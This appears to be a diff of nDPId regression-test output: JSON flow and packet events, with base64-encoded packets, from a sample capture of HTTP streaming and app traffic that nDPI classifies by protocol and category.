-01056{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":151,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1429000378725,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000378725,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeYCSkAAPwboUwo2qfp4HCMoyzYAUPnxUrTwfKXiUBhgH8mSAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNjkudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1429000030398,"flow_last_seen":1429000039635,"flow_idle_time":7440000,"flow_min_l4_payload_len":309,"flow_max_l4_payload_len":1324,"flow_tot_l4_payload_len":3136,"flow_avg_l4_payload_len":784,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.41","src_port":50668,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1429000030766,"flow_last_seen":1429000040059,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":3456,"flow_avg_l4_payload_len":864,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.41","src_port":50669,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000041481,"flow_last_seen":1429000041819,"flow_idle_time":7440000,"flow_min_l4_payload_len":181,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":232,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"31.13.68.49","src_port":44793,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}} -00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1429000050062,"flow_last_seen":1429000052145,"flow_idle_time":7440000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":1169,"flow_avg_l4_payload_len":389,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.151.160","src_port":54883,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000052348,"flow_last_seen":1429000052688,"flow_idle_time":7440000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":529,"flow_avg_l4_payload_len":264,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.129.101","src_port":42761,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000054595,"flow_last_seen":1429000054967,"flow_idle_time":7440000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":560,"flow_tot_l4_payload_len":765,"flow_avg_l4_payload_len":382,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.129.101","src_port":42762,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"}} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1429000031075,"flow_last_seen":1429000031382,"flow_idle_time":7440000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":302,"flow_tot_l4_payload_len":355,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.5.18","src_port":33064,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000037600,"flow_last_seen":1429000037659,"flow_idle_time":7440000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":266,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.26.231","src_port":33277,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000117728,"flow_last_seen":1429000118045,"flow_idle_time":7440000,"flow_min_l4_payload_len":582,"flow_max_l4_payload_len":775,"flow_tot_l4_payload_len":1357,"flow_avg_l4_payload_len":678,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"54.179.140.65","src_port":56381,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1429000049060,"flow_last_seen":1429000051518,"flow_idle_time":7440000,"flow_min_l4_payload_len":444,"flow_max_l4_payload_len":1096,"flow_tot_l4_payload_len":2511,"flow_avg_l4_payload_len":627,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52007,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":65,"flow_first_seen":1429000052217,"flow_last_seen":1429000153720,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":42262,"flow_avg_l4_payload_len":650,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52009,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1429000153937,"flow_last_seen":1429000207676,"flow_idle_time":7440000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":5584,"flow_avg_l4_payload_len":698,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52017,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1429000207973,"flow_last_seen":1429000236577,"flow_idle_time":7440000,"flow_min_l4_payload_len":72,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":4656,"flow_avg_l4_payload_len":665,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52018,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1429000237766,"flow_last_seen":1429000347404,"flow_idle_time":7440000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":18206,"flow_avg_l4_payload_len":728,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52019,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1429000347103,"flow_last_seen":1429000374116,"flow_idle_time":7440000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":1192,"flow_tot_l4_payload_len":2530,"flow_avg_l4_payload_len":632,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52021,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1429000375190,"flow_last_seen":1429000385363,"flow_idle_time":7440000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":3892,"flow_avg_l4_payload_len":556,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52022,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000031698,"flow_last_seen":1429000032158,"flow_idle_time":7440000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":470,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"173.252.74.22","src_port":52285,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000037314,"flow_last_seen":1429000037771,"flow_idle_time":7440000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":470,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"173.252.74.22","src_port":52288,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000110390,"flow_last_seen":1429000110528,"flow_idle_time":7440000,"flow_min_l4_payload_len":206,"flow_max_l4_payload_len":625,"flow_tot_l4_payload_len":831,"flow_avg_l4_payload_len":415,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.147.215","src_port":35670,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"}} -00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1429000048159,"flow_last_seen":1429000048795,"flow_idle_time":7440000,"flow_min_l4_payload_len":487,"flow_max_l4_payload_len":1169,"flow_tot_l4_payload_len":2143,"flow_avg_l4_payload_len":714,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.5.41","src_port":44256,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000030398,"flow_last_seen":1429000030398,"flow_idle_time":7560000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1429000030398,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.41","src_port":50668,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00873{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1429000030398,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":368,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":368,"pkt_l4_len":332,"thread_ts_msec":1429000030398,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAWBDAUAAPwaoIQo2qfp4HCMpxewAUEHDiNf6xwiBUBgAc22rAABHRVQgL3NvbHIvUmVzdEFwaVNpbmdUZWxfUEgvcmVzdGFwaS9jYXRlZ29yaWVzL0hVRD9hcGlLZXk9cXdlcnR5JmRldmljZT1hbmRyb2lkbW9iaWxlJmxvY2FsZT1lbmcmbmV0d29yaz1XSUZJJnBhZ2VOdW1iZXI9MSZwYWdlU2l6ZT01MCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogRGFsdmlrLzEuNi4wIChMaW51eDsgVTsgQW5kcm9pZCA0LjQuNDsgTUkgM1cgTUlVSS9WNi40LjIuMC5LWERNSUNCKQ0KSG9zdDogYXBpLXNpbmd0ZWxoYXdrLnF1aWNrcGxheS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo="} +00983{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000030398,"flow_last_seen":1429000030398,"flow_idle_time":7560000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1429000030398,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.41","src_port":50668,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"api-singtelhawk.quickplay.com","url":"api-singtelhawk.quickplay.com\/solr\/RestApiSingTel_PH\/restapi\/categories\/HUD?apiKey=qwerty&device=androidmobile&locale=eng&network=WIFI&pageNumber=1&pageSize=50","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} +02237{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1429000030498,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1380,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":1380,"pkt_l4_len":1344,"thread_ts_msec":1429000030498,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcBVSmuUAArQbSWHgcIykKNqn6AFDF7PrHCIFBw4oPUBgIIgJuAABIVFRQLzEuMSAyMDAgT0sNClNlcnZlcjogQXBhY2hlLUNveW90ZS8xLjENCkxhc3QtTW9kaWZpZWQ6IFR1ZSwgMTQgQXByIDIwMTUgMDc6MTg6NTQgR01UDQpFVGFnOiAiWW1JNE1EQXdNREF3TURBd01EQXdNRk52YkhJPSINCkNvbnRlbnQtRW5jb2Rpbmc6IGd6aXANClZhcnk6IEFjY2VwdC1FbmNvZGluZw0KQWNjZXNzLUNvbnRyb2wtQWxsb3ctT3JpZ2luOiAqDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1IZWFkZXJzOiB4LXJlcXVlc3RlZC13aXRoDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1NZXRob2RzOiBQT1NULCBHRVQsIE9QVElPTlMsIERFTEVURQ0KWC1DbmVjdGlvbjogY2xvc2UNCkNhY2hlLUNvbnRyb2w6IHB1YmxpYywgbWF4LWFnZT0xMzg2DQpFeHBpcmVzOiBUdWUsIDE0IEFwciAyMDE1IDA4OjUwOjE2IEdNVA0KRGF0ZTogVHVlLCAxNCBBcHIgMjAxNSAwODoyNzoxMCBHTVQNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vanNvbjtjaGFyc2V0PVVURi04DQpDb250ZW50LUxlbmd0aDogNzg1DQoNCh+LCAAAAAAAAADkV89v0zAYve+vsHrgNFDbgUDcyrpuYoyhtfSCOHxNvqZmjh35x0ap+r9jp2mXNIlbzRwQXCr1+17ynv3s+Hl1QgjpLBBilJ33ZOX+uorSoI2ylY4yUYRKdU63rQwS\/GzSWf5Ar1Ie019oi2+6u6oWGtgFwxS5dq87q3a+2Idcueeq67zXSYHyO1TCyAjLkmS95so0diqvvg53CsvgyTJzD3Qi0JgIuayAmIiA5W3kSaUDWssJJK4VowbKVKXNIcUm1hhVJGmmqeB528TkvIn4HpePQsZu5N+eyq7j3vhU+V5+CDnMGA6lyIbikd8gz\/3R0mBVwhwM07dyY2j3Vbf+jkvkEkeU6RwyB6awDvoEPDHWHg\/up0YeYzywk0VnRudOrtYFYr1zeg4R5uaXbUuchtr4V5V\/xVS5qRxEblIH8YNdR8Y+eFoDbj3ZIMkL4gNHwnBt0f1KZ316pBhOU8hN9sjwYMLYz0WK8dJD3QoI4x2KyLhtDNJH7kcFKpCQgo+7pR\/GemnfPl6IR+VhdhjSBgqjvxJSCunhbgWE8V7TWI0gpczntgPZrdaKC5NwA1JTYAOp1TgT9tejpMASB7aKWvFhiu4QGNXLydSjpMCQRlAgvUiBR76vXzsijHkc0REdgd3XyrceLOzliJJ2YJiKyUJSxtC3GzyQMO4pSIp6ecHtaWgTAXcfOY+OAk4O4beielVRLRmAFYfy8QfnXrLZU3nBE0bVwqOr+6zJSmTPw\/pBMGYDkIj\/OO+PzHcmf4QMOCrf7ngerU6Yb0lCAkw02RDGeu89Fq6FRPClj27rijsplYpQbtM95TbKxttkXs6u9Th+Ix4oVjNzYCLPQBZXiEML\/xiiithq5ibtu690K7C7RtM9ibujqD7447J7UzpvxtTC+T6Mm\/R2Pjazsl391\/3tp2+3xOrWTaa1HPMfeTeZkjHKv9K+3tuzw+65QOa1TmUY2Zz07zlXG3mzaS233eddiY+yrf+u\/D3dDK0zF2LzCntfXv8GAAD\/\/wIMAEf8Fz+FEQAA"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000030766,"flow_last_seen":1429000030766,"flow_idle_time":7560000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1429000030766,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.41","src_port":50669,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00874{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1429000030766,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":368,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":368,"pkt_l4_len":332,"thread_ts_msec":1429000030766,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAWA50EAAPwaxUgo2qfp4HCMpxe0AUOei8\/4RmPGFUBgAc1zOAABHRVQgL3NvbHIvUmVzdEFwaVNpbmdUZWxfUEgvcmVzdGFwaS9jYXRlZ29yaWVzL0hVRD9hcGlLZXk9cXdlcnR5JmRldmljZT1hbmRyb2lkbW9iaWxlJmxvY2FsZT1lbmcmbmV0d29yaz1XSUZJJnBhZ2VOdW1iZXI9MSZwYWdlU2l6ZT01MCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogRGFsdmlrLzEuNi4wIChMaW51eDsgVTsgQW5kcm9pZCA0LjQuNDsgTUkgM1cgTUlVSS9WNi40LjIuMC5LWERNSUNCKQ0KSG9zdDogYXBpLXNpbmd0ZWxoYXdrLnF1aWNrcGxheS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo="} +00983{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000030766,"flow_last_seen":1429000030766,"flow_idle_time":7560000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1429000030766,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.41","src_port":50669,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"api-singtelhawk.quickplay.com","url":"api-singtelhawk.quickplay.com\/solr\/RestApiSingTel_PH\/restapi\/categories\/HUD?apiKey=qwerty&device=androidmobile&locale=eng&network=WIFI&pageNumber=1&pageSize=50","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} +02237{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1429000030832,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1380,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":1380,"pkt_l4_len":1344,"thread_ts_msec":1429000030832,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcBVReB0AArQYbC3gcIykKNqn6AFDF7RGY8YXnovU2UBgIIvGQAABIVFRQLzEuMSAyMDAgT0sNClNlcnZlcjogQXBhY2hlLUNveW90ZS8xLjENCkxhc3QtTW9kaWZpZWQ6IFR1ZSwgMTQgQXByIDIwMTUgMDc6MTg6NTQgR01UDQpFVGFnOiAiWW1JNE1EQXdNREF3TURBd01EQXdNRk52YkhJPSINCkNvbnRlbnQtRW5jb2Rpbmc6IGd6aXANClZhcnk6IEFjY2VwdC1FbmNvZGluZw0KQWNjZXNzLUNvbnRyb2wtQWxsb3ctT3JpZ2luOiAqDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1IZWFkZXJzOiB4LXJlcXVlc3RlZC13aXRoDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1NZXRob2RzOiBQT1NULCBHRVQsIE9QVElPTlMsIERFTEVURQ0KWC1DbmVjdGlvbjogY2xvc2UNCkNhY2hlLUNvbnRyb2w6IHB1YmxpYywgbWF4LWFnZT0xMzg2DQpFeHBpcmVzOiBUdWUsIDE0IEFwciAyMDE1IDA4OjUwOjE2IEdNVA0KRGF0ZTogVHVlLCAxNCBBcHIgMjAxNSAwODoyNzoxMCBHTVQNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vanNvbjtjaGFyc2V0PVVURi04DQpDb250ZW50LUxlbmd0aDogNzg1DQoNCh+LCAAAAAAAAADkV89v0zAYve+vsHrgNFDbgUDcyrpuYoyhtfSCOHxNvqZmjh35x0ap+r9jp2mXNIlbzRwQXCr1+17ynv3s+Hl1QgjpLBBilJ33ZOX+uorSoI2ylY4yUYRKdU63rQwS\/GzSWf5Ar1Ie019oi2+6u6oWGtgFwxS5dq87q3a+2Idcueeq67zXSYHyO1TCyAjLkmS95so0diqvvg53CsvgyTJzD3Qi0JgIuayAmIiA5W3kSaUDWssJJK4VowbKVKXNIcUm1hhVJGmmqeB528TkvIn4HpePQsZu5N+eyq7j3vhU+V5+CDnMGA6lyIbikd8gz\/3R0mBVwhwM07dyY2j3Vbf+jkvkEkeU6RwyB6awDvoEPDHWHg\/up0YeYzywk0VnRudOrtYFYr1zeg4R5uaXbUuchtr4V5V\/xVS5qRxEblIH8YNdR8Y+eFoDbj3ZIMkL4gNHwnBt0f1KZ316pBhOU8hN9sjwYMLYz0WK8dJD3QoI4x2KyLhtDNJH7kcFKpCQgo+7pR\/GemnfPl6IR+VhdhjSBgqjvxJSCunhbgWE8V7TWI0gpczntgPZrdaKC5NwA1JTYAOp1TgT9tejpMASB7aKWvFhiu4QGNXLydSjpMCQRlAgvUiBR76vXzsijHkc0REdgd3XyrceLOzliJJ2YJiKyUJSxtC3GzyQMO4pSIp6ecHtaWgTAXcfOY+OAk4O4beielVRLRmAFYfy8QfnXrLZU3nBE0bVwqOr+6zJSmTPw\/pBMGYDkIj\/OO+PzHcmf4QMOCrf7ngerU6Yb0lCAkw02RDGeu89Fq6FRPClj27rijsplYpQbtM95TbKxttkXs6u9Th+Ix4oVjNzYCLPQBZXiEML\/xiiithq5ibtu690K7C7RtM9ibujqD7447J7UzpvxtTC+T6Mm\/R2Pjazsl391\/3tp2+3xOrWTaa1HPMfeTeZkjHKv9K+3tuzw+65QOa1TmUY2Zz07zlXG3mzaS233eddiY+yrf+u\/D3dDK0zF2LzCntfXv8GAAD\/\/wIMAEf8Fz+FEQAA"} 